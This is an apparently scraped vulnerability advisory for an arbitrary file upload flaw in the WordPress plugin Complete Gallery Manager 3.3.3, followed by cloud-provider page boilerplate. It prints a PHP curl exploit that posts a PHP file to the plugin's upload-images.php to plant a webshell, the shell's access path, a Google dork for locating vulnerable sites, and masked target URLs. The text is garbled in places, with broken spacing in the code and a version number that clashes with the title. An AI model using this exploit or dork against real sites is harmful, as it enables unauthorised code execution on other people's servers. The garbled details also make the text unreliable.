Wordpress plugin Complete Gallery Manager 3.3.3 Arbitrary File Upload

Source: Internet
Author: User

Title: ====== Wordpress Plugin Complete Gallery Manager 3.3.3-Arbitrary File Upload Vulnerability affected version: =============================================================== 6.6 introduction: ============== Using Complete Gallery Manager will make it fun and fast to manage and create galleries for your website. the plugin enables a wealth of functionality, but just because you can take advantage of its own features, doesn't mean you necessarily sh Ocould. For each feature you implement you shocould consider the benefit for your users. Don't make the interface more complex than necessary. Less is more! We have made it very easy for you to customize basically anything you can imagine. The Isotype Gallery has 188 different settings you can tweak and the Touch Slider has 146 different settings. (from: http://codecanyon.net/item/complete-gallery-manager-for-wordpress/2418606 ) Abstract: ========== An independent Vulnerability Laboratory Researcher discovered a arbitrary file upload vulnerability in the Wordpress Complete Gallery Manager v3.3.3 plugin. affected products: ========================== CodeCanyonProduct: Complete Gallery Manager 3.3.3 level: ========== high-risk analysis: ======== A arbitrary file upload web vulnerability is detected in the CodeCanyon Wordpress Plugin Complete Gallery Manager v3.3.3 Web-Application.The vulnerability allows remote attackers to upload files via POST method with multiple extensions unauthorized access them on application-side of the service. the vulnerability is located in the/plugins/complete-gallery-manager/frames/path when processing to upload via the upload-images.php file own malicious context or webshells. after the upload the remote attacker can access the file with one extension and exchange it with the other one to execute for example php codes. exploitation of the vulnerability requires no user interaction and also without privilege application user account (no password standard ). successful exploitation of the vulnerability results in unauthorized path or file access via local file include or arbitrary file upload. vulnerable Application (s): [+] CodeCanyon-Complete Gallery Manager Vulnerable Module (s): [+] Image File Upload Vulnerable File (s ): upload-images.php Affected Module (s): [+] Application Index Listing ( http://localhost:8000/ ) Test Certificate ====================== The arbitrary file upload web vulnerability can be exploited by remote attackers without user interaction or privileged application user account. for demonstration or reproduce... vuln page: http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php Exploit: <? Php $ uploadfile = "up. php"; $ ch = curl_init (" http://wordpress.localhost:8080/wordpress/wp-content/plugins/complete-gallery-manager/frames/upload-images.php "); Curl_setopt ($ ch, CURLOPT_POST, true); curl_setopt ($ ch, CURLOPT_POSTFIELDS, array ('qqfile' =>" @ $ uploadfile "); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1); $ postResult = curl_exec ($ ch); curl_close ($ ch); print "$ postResult";?> Shell Upload Access Path: http://wordpress.localhost:8080/wp-content/2013/09/up.php Google Dork: allinurl:/wp-content/plugins/complete-gallery-manager/Reference (s ): http://xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.phphttp://www.xxx.com/wp-content/plugins/complete-gallery-manager/frames/upload-images.phphttp://xxx.org/wp-content/plugins/complete-gallery-manager/frames/upload-images.php Risk: ==== The security risk of the arbitrary file upload web vulnerability is estimated as high (+ ).

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.